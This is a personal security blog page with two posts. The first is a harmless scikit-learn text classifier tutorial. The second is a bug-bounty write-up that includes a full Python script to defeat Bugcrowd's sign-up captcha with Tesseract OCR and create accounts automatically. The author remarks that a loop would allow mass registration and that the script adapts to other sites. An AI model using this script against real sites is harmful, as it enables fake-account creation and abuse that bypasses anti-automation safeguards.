
Tuesday, 30 August 2016

Random String Python Text Classifier Example

In this post I'm going to explain how to write a simple Naive Bayes text classifier in Python and provide some example code.

Machine Learning!? Awesome!!1!

My original goal was to tell the difference between regular dictionary words and random strings. I looked at using manual n-gram frequency analysis, which partially worked, but I wanted to try out an ML solution for comparison.

I don't have much ML experience but it was easy to build a working script using the scikit-learn library. This library abstracts away much of the mathematical complexity and offers a quick, high-level way to implement ML concepts. In just a few lines of Python I was able to build a classifier with 93% accuracy.

It's worth mentioning I did not use the "bag of words" approach, as I was analysing the structure of individual words as opposed to sentences. By changing the CountVectorizer parameters you could look at sentences or groups of words instead.
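To make that distinction concrete, here is a minimal sketch using only the standard library rather than CountVectorizer itself. The helper names `word_features` and `char_ngrams` are made up for illustration and are not part of scikit-learn.

```python
from collections import Counter


def word_features(sentence):
    """Bag of words: count whole words, ignoring their order."""
    return Counter(sentence.lower().split())


def char_ngrams(word, n):
    """Count overlapping character n-grams inside a single word."""
    word = word.lower()
    return Counter(word[i:i + n] for i in range(len(word) - n + 1))


# Sentence-level view: which words appear, and how often.
print(word_features("the cat sat on the mat"))

# Word-level view: which letter pairs appear inside one word.
print(char_ngrams("banana", 2))
```

The first view says nothing about whether an individual word looks "wordy" or random, which is why the character-level view is the better fit for this problem.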

Building a Classifier

Building a classifier is quite simple: you just need to collect your data, format it, vectorize it, then train your model. The script below pretty much follows that process. First up I read in some data using pandas. I have two csv data sets: one file has normal dictionary words, the other random strings. Each row contains the type, 0 or 1 (normal or random), followed by the data, which is just a word. For example:

normal.csv      random.csv
0,apple         1,fdsgsdgfdg
0,banana        1,plicawq
0,orange        1,mncdlppl
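If you want to check the file format without pandas, the rows can be parsed with the standard csv module. This is only a sketch (Python 3): the two strings stand in for the first rows of normal.csv and random.csv, and `read_rows` is a hypothetical helper name.

```python
import csv
import io

# Hypothetical stand-ins for the first rows of normal.csv and random.csv.
NORMAL_CSV = "0,apple\n0,banana\n0,orange\n"
RANDOM_CSV = "1,fdsgsdgfdg\n1,plicawq\n1,mncdlppl\n"


def read_rows(handle):
    """Return (label, word) pairs from a two-column CSV with no header."""
    return [(int(label), word) for label, word in csv.reader(handle)]


rows = read_rows(io.StringIO(NORMAL_CSV)) + read_rows(io.StringIO(RANDOM_CSV))
labels = [label for label, _ in rows]
words = [word for _, word in rows]

print(labels)
print(words)
```

With real files you would pass `open("normal.csv", newline="")` in place of the StringIO objects.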

In each file I used the first 5000 words for training and the next 5000 for testing. To vectorize the words I used the CountVectorizer with character n-grams enabled. This breaks each word up into its n-grams (short runs of adjacent characters) and converts them to numeric counts.
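Roughly speaking, the vectorization step looks like the sketch below. It is a simplified approximation of what a character n-gram vectorizer does, not scikit-learn's actual implementation (very short words, for example, are handled differently), and the function names are assumptions of mine.

```python
def char_wb_ngrams(word, min_n=2, max_n=4):
    """Character n-grams of a space-padded word, for n = min_n..max_n."""
    padded = " " + word.lower() + " "
    grams = []
    for n in range(min_n, max_n + 1):
        for i in range(len(padded) - n + 1):
            grams.append(padded[i:i + n])
    return grams


def fit_vocabulary(words):
    """Assign a column index to every n-gram seen in the training words."""
    vocab = {}
    for word in words:
        for gram in char_wb_ngrams(word):
            vocab.setdefault(gram, len(vocab))
    return vocab


def transform(words, vocab):
    """Turn each word into a row of n-gram counts; unseen n-grams are dropped."""
    rows = []
    for word in words:
        row = [0] * len(vocab)
        for gram in char_wb_ngrams(word):
            if gram in vocab:
                row[vocab[gram]] += 1
        rows.append(row)
    return rows


vocab = fit_vocabulary(["apple", "plicawq"])
matrix = transform(["apple", "zzz"], vocab)
print(len(char_wb_ngrams("apple")))  # 6 + 5 + 4 n-grams from " apple "
print(sum(matrix[0]), sum(matrix[1]))
```

The vocabulary is built from the training words only, which is why the test words are passed through a plain transform: any n-gram the model never saw in training simply contributes nothing.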

With the data ready I used the "fit" function to train the classifier with the training data set. To measure the accuracy of the model I used the "score" function with the test data set. And finally, to manually test some values, I used the "predict" function. In the end my classifier reached 93% accuracy, which I thought was pretty good considering I made hardly any customisations.

I used the Multinomial Naive Bayes classifier as this was recommended, however other algorithms may work more effectively. The classifier and vectorizer also support a number of additional parameters that can be adjusted to improve the accuracy. I modified them only slightly, so further improvements could likely be made here as well.
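For anyone curious what fit, predict and score are doing under the hood, here is a toy multinomial Naive Bayes in plain Python 3. It is an illustrative sketch only: the class name `TinyMultinomialNB`, the bigram-only features and the six training words are all made up, and scikit-learn's real implementation works on sparse count matrices instead.

```python
import math
from collections import Counter, defaultdict


def bigrams(word):
    """Character bigrams of a space-padded word (a simplified feature set)."""
    padded = " " + word.lower() + " "
    return [padded[i:i + 2] for i in range(len(padded) - 1)]


class TinyMultinomialNB:
    """Illustrative multinomial Naive Bayes with additive smoothing (alpha)."""

    def __init__(self, alpha=0.1):
        self.alpha = alpha

    def fit(self, words, labels):
        self.counts = defaultdict(Counter)   # label -> feature counts
        self.docs = Counter(labels)          # label -> number of training words
        for word, label in zip(words, labels):
            self.counts[label].update(bigrams(word))
        self.vocab = {g for c in self.counts.values() for g in c}
        return self

    def _log_score(self, word, label):
        total = sum(self.counts[label].values())
        denom = total + self.alpha * len(self.vocab)
        score = math.log(self.docs[label] / sum(self.docs.values()))
        for gram in bigrams(word):
            if gram in self.vocab:  # features unseen in training are ignored
                score += math.log((self.counts[label][gram] + self.alpha) / denom)
        return score

    def predict(self, words):
        return [max(self.docs, key=lambda lab: self._log_score(w, lab))
                for w in words]

    def score(self, words, labels):
        hits = sum(p == t for p, t in zip(self.predict(words), labels))
        return hits / len(labels)


clf = TinyMultinomialNB(alpha=0.1).fit(
    ["apple", "banana", "orange", "xqzvk", "zzkqx", "qxvzz"],
    [0, 0, 0, 1, 1, 1],
)
print(clf.predict(["grape", "zqxk"]))
```

The alpha value plays the same role as in MultinomialNB(alpha=0.1): it stops an n-gram that never appeared in one class from forcing that class's probability to zero.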

The Code

The following was written for Python 2.7 and needs scikit-learn, pandas and the two csv files containing data as described above.

from sklearn.feature_extraction.text import CountVectorizer
from sklearn.naive_bayes import MultinomialNB
import pandas as pd
from time import time

# Start timer
t0 = time()

# Create classifier and vectorizer
clf = MultinomialNB(alpha=0.1)
vec = CountVectorizer(analyzer='char_wb', ngram_range=(2, 4), min_df=1)

# Read in wordset and vectorize words
# Training data: the first 5000 rows of each file
train_set = pd.concat(pd.read_csv(f, names=["type", "word"], nrows=5000)
                      for f in ["normal.csv", "random.csv"])
train_types = train_set.type.tolist()
train_words = vec.fit_transform(train_set.word.tolist())

# Test data: the next 5000 rows of each file
test_set = pd.concat(pd.read_csv(f, names=["type", "word"], skiprows=5000, nrows=5000)
                     for f in ["normal.csv", "random.csv"])
test_types = test_set.type.tolist()
test_words = vec.transform(test_set.word.tolist())

# Train classifier (the timing below also includes loading and vectorizing the data)
clf.fit(train_words, train_types)
train_time = time() - t0
print("Training time: %0.3fs" % train_time)

# Use test data to evaluate classifier
print("Accuracy is " + str(clf.score(test_words, test_types)))
test_time = time() - train_time - t0
print("Testing time: %0.3fs" % test_time)

# Classify words
testdata = ['xgrdqwlpfrr', 'apple']
print(testdata)
print(clf.predict(vec.transform(testdata)))
predict_time = time() - test_time - train_time - t0
print("Predict time: %0.3fs" % predict_time)

Running the script should give you something like the following:


Scikit Tips

If you're trying to install scikit-learn on Windows you'll need to install the relevant .whl package. On Linux I had to upgrade pip before it would install.


Final Thoughts

I was amazed how quick and easy it was to write a simple classifier. Machine learning has definitely gone mainstream. I focused on finding the difference between normal and random strings, however classifiers can be used to tell the difference between all kinds of data sets.

As this is a security blog, you may be wondering why I'd be looking into text classifiers. Well, when analysing data to detect attackers you'll often want to classify various activity. Performing analysis with a classifier can give some interesting results :)

Hope you guys have found this useful. Any questions or comments, leave a message below.

Pwndizzle out.

Thursday, 5 December 2013

Breaking Bugcrowd's Captcha with Python and Tesseract

In this post I'm going to talk about bypassing Bugcrowd's captcha using Python and Tesseract. This post was originally written for the Bugcrowd blog here: http://blog.bugcrowd.com/guest-blog-breaking-bugcrowds-captcha-pwndizzle/


A Bugcrowd Bounty

A while back Bugcrowd started a bounty for the main Bugcrowd site. While flicking through the site looking for issues I noticed they were using a pretty basic captcha. In certain sections of the site, for example account sign up, password reset and on multiple failed passwords, you were required to enter the captcha to verify you were human:

This in theory would prevent the automated use of these functions. But if I could find a way to bypass the captcha I could potentially abuse these functions.


So how do you bypass a captcha? 

If it's a home-grown captcha you may be lucky enough to find a logic flaw, such as the captcha code being included on the current page, or perhaps you can re-use a valid captcha more than once.

If you're dealing with a more sophisticated captcha you've got two options. Either you outsource the work to a developing country (http://krebsonsecurity.com/2012/01/virtual-sweatshops-defeat-bot-or-not-tests/) or you can try optical character recognition (OCR).  


OCR?

Assuming you don't choose to outsource the work, there are a few different OCR frameworks out there that you can use to automatically analyse an image and have it return a list of characters. I found Tesseract (https://code.google.com/p/tesseract-ocr/) to be a good choice as its engine has been pre-trained and it worked out of the box with decent results.

As the Bugcrowd captcha was so simple, all I needed to do was enlarge the image before submitting it to Tesseract for the analysis to succeed most of the time. For other, more complex captchas that use distorted characters or overlays to mask the text, you will need to clean the image before submitting it to Tesseract. Some examples can be found in the references below.
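To give a feel for what "cleaning" and "enlarging" mean at the pixel level, here is a rough sketch that works on a plain list of grayscale values rather than a real image file. The threshold of 128 and the sample patch are arbitrary assumptions, and the enlarging here is simple pixel repetition (nearest neighbour), not a smoothing filter. In practice an imaging library would do this work.

```python
def binarize(pixels, threshold=128):
    """Map each grayscale pixel (0-255) to pure black (0) or pure white (255)."""
    return [[0 if value < threshold else 255 for value in row] for row in pixels]


def upscale(pixels, factor):
    """Enlarge a pixel grid by repeating every pixel factor x factor times."""
    enlarged = []
    for row in pixels:
        wide_row = [value for value in row for _ in range(factor)]
        enlarged.extend(list(wide_row) for _ in range(factor))
    return enlarged


# Hypothetical 2x3 grayscale patch: dark text pixels on a noisy light background.
patch = [
    [30, 200, 180],
    [220, 40, 140],
]

clean = binarize(patch)
big = upscale(clean, 2)
print(clean)
print(len(big), len(big[0]))
```

Thresholding flattens faint background noise to white so the OCR engine only sees the dark character strokes, while enlarging gives it more pixels per character to work with.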


Weaponizing using Python

With a way to obtain the captcha value from the captcha image I decided to create a proof of concept script in Python that could automate account sign-up. Being the lazy security guy I am, I had a look on Google to see if someone else had already created a similar script and although there were captcha breaking scripts I couldn't find an example of a full attack. So instead I wrote my own.

The Bugcrowd sign-up process consisted of two requests: one to retrieve the sign-up page (containing the captcha and csrf tokens) and a second to send the sign-up data (username, email, password etc.). To automate the whole process the script would need to download a copy of the sign-up page, extract the csrf and captcha tokens, download and analyse the captcha, then submit a sign-up request containing the following:


Using Python 3.3 I cobbled together the following:

# A script to bypass the Bugcrowd sign-up page captcha
# Created by @pwndizzle - http://pwndizzle.blogspot.com

from PIL import Image
from urllib.error import URLError
from urllib.request import Request, urlopen, urlretrieve
from urllib.parse import urlencode
import re
import subprocess


def getpage():
    global csrf, ctoken
    try:
        print("[+] Downloading Page")
        site = urlopen("https://portal.bugcrowd.com/user/sign_up")
        site_html = site.read().decode("utf-8")
        # Parse page for CSRF token (string 43 characters long ending with =)
        csrf = re.findall('[a-zA-Z0-9+/]{43}=', site_html)
        print("-----CSRF Token: " + csrf[0])
        # Parse page for captcha token (string 40 characters long)
        ctoken = re.findall('[a-z0-9]{40}', site_html)
        print("-----Captcha Token: " + ctoken[0])
    except URLError as e:
        print("*****Error: Cannot retrieve URL*****")


def getcaptcha():
    try:
        print("[+] Downloading Captcha")
        captchaurl = "https://portal.bugcrowd.com/simple_captcha?code=" + ctoken[0]
        urlretrieve(captchaurl, 'captcha1.png')
    except URLError as e:
        print("*****Error: Cannot retrieve URL*****")


def resizer():
    print("[+] Resizing...")
    im1 = Image.open("captcha1.png")
    width, height = im1.size
    # Enlarge the image five times in each dimension
    im2 = im1.resize((int(width*5), int(height*5)), Image.BICUBIC)
    im2.save("captcha2.png")


def tesseract():
    global cvalue
    try:
        print("[+] Running Tesseract...")
        # Run Tesseract, -psm 8, tells Tesseract we are looking for a single word
        subprocess.call(['C:\\Program Files (x86)\\Tesseract-OCR\\tesseract.exe',
                         'C:\\Python33\\captcha2.png', 'output', '-psm', '8'])
        # Raw string so the backslashes in the path are not read as escapes
        with open(r"C:\Python33\output.txt", "r") as f:
            # Remove whitespace and newlines from Tesseract output
            cvaluelines = f.read().replace(" ", "").split('\n')
        cvalue = cvaluelines[0]
        print("-----Captcha: " + cvalue)
    except Exception as e:
        print("Error: " + str(e))


def send():
    try:
        print("[+] Sending request...")
        user = "testuser99"
        # utf8 is the check mark character; urlencode turns it into %E2%9C%93
        params = {'utf8': '\u2713',
                  'authenticity_token': csrf[0],
                  'user[username]': user,
                  'user[email]': user + '@test.com',
                  'user[password]': 'password123',
                  'user[password_confirmation]': 'password123',
                  'captcha': cvalue,
                  'captcha_key': ctoken[0],
                  'agree_terms_conditions': 'true'}
        data = urlencode(params).encode('utf-8')
        request = Request("https://portal.bugcrowd.com/user")
        # Send request and analyse response
        f = urlopen(request, data)
        response = f.read().decode('utf-8')
        # Check for error message
        fail = re.search('The following errors occurred', response)
        if fail:
            print("-----Account creation failed!")
        else:
            print("-----Account created!")
    except Exception as e:
        print("Error: " + str(e))


print("[+] Start!")
# Download page and parse data
getpage()
# Download captcha image
getcaptcha()
# Resize captcha image
resizer()
# Need more filtering? Add subroutines here!
# Use Tesseract to analyse captcha image
tesseract()
# Send request to site containing form data and captcha
send()
print("[+] Finished!")
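The token parsing is the easiest part of the script to try offline. The sketch below applies the same two regular expressions to a made-up page fragment. The HTML, the token values and the `extract_tokens` helper are all hypothetical, since the real sign-up page markup isn't reproduced here.

```python
import re

# Hypothetical page fragment; the real sign-up page markup is not shown in the post.
SAMPLE_HTML = (
    '<meta content="' + "A" * 43 + '=" name="csrf-token" />\n'
    '<img src="/simple_captcha?code='
    + "0123456789abcdef0123456789abcdef01234567" + '" />\n'
)

CSRF_PATTERN = re.compile(r"[a-zA-Z0-9+/]{43}=")
CAPTCHA_PATTERN = re.compile(r"[a-z0-9]{40}")


def extract_tokens(html):
    """Return (csrf, captcha_token), or None if either token is missing."""
    csrf = CSRF_PATTERN.search(html)
    captcha = CAPTCHA_PATTERN.search(html)
    if csrf is None or captcha is None:
        return None
    return csrf.group(0), captcha.group(0)


print(extract_tokens(SAMPLE_HTML))
print(extract_tokens("<html>no tokens here</html>"))
```

Matching on length and character set alone is fragile: any other 40-character lowercase string on the page would be picked up first, so returning None on a miss (rather than indexing into an empty list) makes failures easier to spot.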

Running the script from the c:\Python33 folder against a Bugcrowd signup page with the following captcha:

I get the following output:


Awesome, so with one click the script can create an account. Add a for loop and make the username/email dynamic and we can sign up for as many accounts as we like, all automatically. So you're probably thinking "if it's that easy to bypass a captcha why isn't everyone doing it?". Well there are some important points to remember:

  • Tesseract doesn't analyse the captcha correctly every time. With Bugcrowd's simple captcha I was getting about a 30% success rate.
  • Most sites don't use such a simple captcha and filtering noise can be tricky. A harder captcha means a lower success rate, more requests and a greater chance of getting caught/locked out.
  • There could be server-side mitigations in place we don't know about, e.g. each IP cannot create more than five accounts a day.
  • The impact of a captcha bypass and mitigations can vary greatly depending on what the captcha is trying to protect.
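To put the 30% figure in perspective, here is some quick arithmetic, assuming each attempt succeeds independently with the same probability (a simplification, since real captchas vary in difficulty). The function names are my own.

```python
import math


def expected_attempts(p):
    """Mean number of tries until the first success (geometric distribution)."""
    return 1 / p


def chance_within(p, tries):
    """Probability of at least one success in the given number of tries."""
    return 1 - (1 - p) ** tries


def tries_needed(p, target):
    """Smallest number of tries whose success chance reaches the target."""
    return math.ceil(math.log(1 - target) / math.log(1 - p))


p = 0.30  # approximate OCR success rate reported above
print(round(expected_attempts(p), 2))
print(round(chance_within(p, 5), 3))
print(tries_needed(p, 0.95))
```

So on average it takes a little over three requests per successful submission, and every failed request is another chance for a lockout or rate limit to kick in.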


Final Thoughts

I like the concept of captchas: current machines struggle with optical recognition, and an image check is all it takes to prevent automation. As demonstrated, though, simple letter/number captchas can be easy to break, and everyday use can frustrate users. For me, images of people/objects/scenes, like the friend captcha used by Facebook, or interactive captchas/mini-games like those offered by http://areyouahuman.com/, appear to be an interesting alternative that offers effective anti-automation (for now) with improved user experience.

If you want to re-use the script it should work fine on other machines and sites, but you'll need to change the URLs, the parsing logic and possibly apply image filters depending on the captcha you're targeting. I built the script using Python 3.3 and Tesseract 3.02 with default installation locations on Windows 7.

For more information about breaking captchas with Python I'd definitely recommend checking out the following posts:

http://blog.c22.cc/2010/10/12/python-ocr-or-how-to-break-captchas/

http://www.debasish.in/2012/01/bypass-captcha-using-python-and.html

http://bokobok.fr/bypassing-a-captcha-with-python/

Also, cleaning captchas with ImageMagick looked interesting but I didn't get round to testing it:

http://www.imagemagick.org

Thanks to Bugcrowd for all their awesome work. I hope you guys have found this post useful. Questions and feedback are always appreciated so drop me a comment below :)

Pwndizzle out.